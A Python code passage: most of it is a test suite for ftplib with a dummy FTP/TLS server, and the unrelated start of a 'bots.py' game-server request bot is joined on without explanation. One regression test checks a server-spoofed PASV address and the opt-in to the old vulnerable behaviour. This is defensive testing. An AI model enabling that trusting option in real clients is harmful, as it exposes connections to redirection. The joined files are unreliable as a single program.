def found_terminator(self):
line = b''.join(self.in_buffer).decode(self.encoding)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode(self.encoding) + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
ip = self.fake_pasv_server_ip
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
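# e.g. port 2121 is advertised as (h1,h2,h3,h4,8,73), since 8 * 256 + 73 == 2121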
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET, encoding=DEFAULT_ENCODING):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
self.encoding = encoding
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn, encoding=self.encoding)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
DummyFTPHandler.__init__(self, conn, encoding=encoding)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyFTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode(self.client.encoding))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode(self.client.encoding))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_makepasv_issue43285_security_disabled(self):
"""Test the opt-in to the old vulnerable behavior."""
self.client.trust_server_pasv_ipv4_address = True
bad_host, port = self.client.makepasv()
self.assertEqual(
bad_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((self.client.sock.getpeername()[0], port),
timeout=TIMEOUT).close()
def test_makepasv_issue43285_security_enabled_default(self):
self.assertFalse(self.client.trust_server_pasv_ipv4_address)
trusted_host, port = self.client.makepasv()
self.assertNotEqual(
trusted_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((trusted_host, port), timeout=TIMEOUT).close()
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = socket_helper.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = socket_helper.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
def test_encoding_param(self):
encodings = ['latin-1', 'utf-8']
for encoding in encodings:
with self.subTest(encoding=encoding):
self.tearDown()
self.setUp(encoding=encoding)
self.assertEqual(encoding, self.client.encoding)
self.test_retrbinary()
self.test_storbinary()
self.test_retrlines()
new_dir = self.client.mkd('/non-ascii dir \xAE')
self.check_data(new_dir, '/non-ascii dir \xAE')
# Check default encoding
client = ftplib.FTP(timeout=TIMEOUT)
self.assertEqual(DEFAULT_ENCODING, client.encoding)
@skipUnless(socket_helper.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0),
af=socket.AF_INET6,
encoding=DEFAULT_ENCODING)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=DEFAULT_ENCODING)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = socket_helper.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
# bpo-39259
with self.assertRaises(ValueError):
ftplib.FTP(HOST, timeout=0)
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def setUpModule():
thread_info = support.threading_setup()
unittest.addModuleCleanup(support.threading_cleanup, *thread_info)
if __name__ == '__main__':
unittest.main()
|
bots.py
|
import requests
import time
import abc
import random
import string
from multiprocessing import Process, Pipe
# functions to generate random json data for API requests
def GSIgen():
return {}
def accgen():
return {'x': random.randrange(-5,5), 'y':random.randrange(-5,5)}
def scangen():
return {'width':random.randrange(1,90),'direction':random.randrange(-345,456),'energy':random.randrange(1,10)}
def shootgen():
return {'width':random.randrange(1,90),'direction':random.randrange(-345,456),'energy':random.randrange(1,10),'damage':0.000001}
def shieldgen():
return {'width':random.randrange(1,180),'direction':random.randrange(-345,456)}
API = [ ['shoot', shootgen], ['scan', scangen], ['getShipInfo', GSIgen], ['accelerate', accgen], ['shield', shieldgen] ]
def randomAPI():
api = random.choice(API)
return api[0], api[1]()
class Bot:
def __init__(self,server):
self.host = server.host
self.port = server.port
resp = requests.post(url='http://' + self.host + ':' + str(self.port) + '/connect')
self.token = resp.json()['token']
self.apiCallTimes = {}
self.p = None
self.pipe = None
self.name = "Bot"
#def api(self, path, data):
# data['token'] = self.token
# return requests.post(url = 'http://' + self.host + ':' + str(port) + '/' + path, json=data)
def quit(self):
data = { 'token': self.token }
return requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/disconnect', json=data)
def timedapi(self, path, data=None):
data = {} if data is None else data
data['token'] = self.token
start = time.time()
resp = requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/' + path, json=data)
end = time.time()
if path not in self.apiCallTimes:
self.apiCallTimes[path] = []
self.apiCallTimes[path].append(end-start)
return (resp,end-start)
def generate_output(self,word="basic"):
return "I am a " + word + " bot and did nothing succesfully"
def run_inner(self, output, t = 3):
output.send(self.generate_output())
def run(self, t = 3):
self.pipe = Pipe()
